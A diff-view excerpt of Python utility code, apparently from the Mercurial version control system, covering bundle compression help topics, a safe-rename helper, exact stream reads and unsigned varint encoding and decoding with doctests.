3851 """Obtains a list of available bundle compressions for use in help."""
3852 """Obtains a list of available bundle compressions for use in help."""
3852 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3853 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3853 items = {}
3854 items = {}
3854
3855
3855 # We need to format the docstring. So use a dummy object/type to hold it
3856 # We need to format the docstring. So use a dummy object/type to hold it
3856 # rather than mutating the original.
3857 # rather than mutating the original.
3857 class docobject(object):
3858 class docobject(object):
3858 pass
3859 pass
3859
3860
3860 for name in compengines:
3861 for name in compengines:
3861 engine = compengines[name]
3862 engine = compengines[name]
3862
3863
3863 if not engine.available():
3864 if not engine.available():
3864 continue
3865 continue
3865
3866
3866 bt = engine.bundletype()
3867 bt = engine.bundletype()
3867 if not bt or not bt[0]:
3868 if not bt or not bt[0]:
3868 continue
3869 continue
3869
3870
3870 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3871 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3871
3872
3872 value = docobject()
3873 value = docobject()
3873 value.__doc__ = pycompat.sysstr(doc)
3874 value.__doc__ = pycompat.sysstr(doc)
3874 value._origdoc = engine.bundletype.__doc__
3875 value._origdoc = engine.bundletype.__doc__
3875 value._origfunc = engine.bundletype
3876 value._origfunc = engine.bundletype
3876
3877
3877 items[bt[0]] = value
3878 items[bt[0]] = value
3878
3879
3879 return items
3880 return items
3880
3881
3881 i18nfunctions = bundlecompressiontopics().values()
3882 i18nfunctions = bundlecompressiontopics().values()
3882
3883
3883 # convenient shortcut
3884 # convenient shortcut
3884 dst = debugstacktrace
3885 dst = debugstacktrace
3885
3886
3886 def safename(f, tag, ctx, others=None):
3887 def safename(f, tag, ctx, others=None):
3887 """
3888 """
3888 Generate a name that it is safe to rename f to in the given context.
3889 Generate a name that it is safe to rename f to in the given context.
3889
3890
3890 f: filename to rename
3891 f: filename to rename
3891 tag: a string tag that will be included in the new name
3892 tag: a string tag that will be included in the new name
3892 ctx: a context, in which the new name must not exist
3893 ctx: a context, in which the new name must not exist
3893 others: a set of other filenames that the new name must not be in
3894 others: a set of other filenames that the new name must not be in
3894
3895
3895 Returns a file name of the form oldname~tag[~number] which does not exist
3896 Returns a file name of the form oldname~tag[~number] which does not exist
3896 in the provided context and is not in the set of other names.
3897 in the provided context and is not in the set of other names.
3897 """
3898 """
3898 if others is None:
3899 if others is None:
3899 others = set()
3900 others = set()
3900
3901
3901 fn = '%s~%s' % (f, tag)
3902 fn = '%s~%s' % (f, tag)
3902 if fn not in ctx and fn not in others:
3903 if fn not in ctx and fn not in others:
3903 return fn
3904 return fn
3904 for n in itertools.count(1):
3905 for n in itertools.count(1):
3905 fn = '%s~%s~%s' % (f, tag, n)
3906 fn = '%s~%s~%s' % (f, tag, n)
3906 if fn not in ctx and fn not in others:
3907 if fn not in ctx and fn not in others:
3907 return fn
3908 return fn
3908
3909
3909 def readexactly(stream, n):
3910 def readexactly(stream, n):
3910 '''read n bytes from stream.read and abort if less was available'''
3911 '''read n bytes from stream.read and abort if less was available'''
3911 s = stream.read(n)
3912 s = stream.read(n)
3912 if len(s) < n:
3913 if len(s) < n:
3913 raise error.Abort(_("stream ended unexpectedly"
3914 raise error.Abort(_("stream ended unexpectedly"
3914 " (got %d bytes, expected %d)")
3915 " (got %d bytes, expected %d)")
3915 % (len(s), n))
3916 % (len(s), n))
3916 return s
3917 return s
3917
3918
3918 def uvarintencode(value):
3919 def uvarintencode(value):
3919 """Encode an unsigned integer value to a varint.
3920 """Encode an unsigned integer value to a varint.
3920
3921
3921 A varint is a variable length integer of 1 or more bytes. Each byte
3922 A varint is a variable length integer of 1 or more bytes. Each byte
3922 except the last has the most significant bit set. The lower 7 bits of
3923 except the last has the most significant bit set. The lower 7 bits of
3923 each byte store the 2's complement representation, least significant group
3924 each byte store the 2's complement representation, least significant group
3924 first.
3925 first.
3925
3926
3926 >>> uvarintencode(0)
3927 >>> uvarintencode(0)
3927 '\\x00'
3928 '\\x00'
3928 >>> uvarintencode(1)
3929 >>> uvarintencode(1)
3929 '\\x01'
3930 '\\x01'
3930 >>> uvarintencode(127)
3931 >>> uvarintencode(127)
3931 '\\x7f'
3932 '\\x7f'
3932 >>> uvarintencode(1337)
3933 >>> uvarintencode(1337)
3933 '\\xb9\\n'
3934 '\\xb9\\n'
3934 >>> uvarintencode(65536)
3935 >>> uvarintencode(65536)
3935 '\\x80\\x80\\x04'
3936 '\\x80\\x80\\x04'
3936 >>> uvarintencode(-1)
3937 >>> uvarintencode(-1)
3937 Traceback (most recent call last):
3938 Traceback (most recent call last):
3938 ...
3939 ...
3939 ProgrammingError: negative value for uvarint: -1
3940 ProgrammingError: negative value for uvarint: -1
3940 """
3941 """
3941 if value < 0:
3942 if value < 0:
3942 raise error.ProgrammingError('negative value for uvarint: %d'
3943 raise error.ProgrammingError('negative value for uvarint: %d'
3943 % value)
3944 % value)
3944 bits = value & 0x7f
3945 bits = value & 0x7f
3945 value >>= 7
3946 value >>= 7
3946 bytes = []
3947 bytes = []
3947 while value:
3948 while value:
3948 bytes.append(pycompat.bytechr(0x80 | bits))
3949 bytes.append(pycompat.bytechr(0x80 | bits))
3949 bits = value & 0x7f
3950 bits = value & 0x7f
3950 value >>= 7
3951 value >>= 7
3951 bytes.append(pycompat.bytechr(bits))
3952 bytes.append(pycompat.bytechr(bits))
3952
3953
3953 return ''.join(bytes)
3954 return ''.join(bytes)
3954
3955
3955 def uvarintdecodestream(fh):
3956 def uvarintdecodestream(fh):
3956 """Decode an unsigned variable length integer from a stream.
3957 """Decode an unsigned variable length integer from a stream.
3957
3958
3958 The passed argument is anything that has a ``.read(N)`` method.
3959 The passed argument is anything that has a ``.read(N)`` method.
3959
3960
3960 >>> try:
3961 >>> try:
3961 ... from StringIO import StringIO as BytesIO
3962 ... from StringIO import StringIO as BytesIO
3962 ... except ImportError:
3963 ... except ImportError:
3963 ... from io import BytesIO
3964 ... from io import BytesIO
3964 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3965 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3965 0
3966 0
3966 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3967 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3967 1
3968 1
3968 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3969 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3969 127
3970 127
3970 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3971 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3971 1337
3972 1337
3972 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3973 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3973 65536
3974 65536
3974 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3975 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3975 Traceback (most recent call last):
3976 Traceback (most recent call last):
3976 ...
3977 ...
3977 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3978 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3978 """
3979 """
3979 result = 0
3980 result = 0
3980 shift = 0
3981 shift = 0
3981 while True:
3982 while True:
3982 byte = ord(readexactly(fh, 1))
3983 byte = ord(readexactly(fh, 1))
3983 result |= ((byte & 0x7f) << shift)
3984 result |= ((byte & 0x7f) << shift)
3984 if not (byte & 0x80):
3985 if not (byte & 0x80):
3985 return result
3986 return result
3986 shift += 7
3987 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now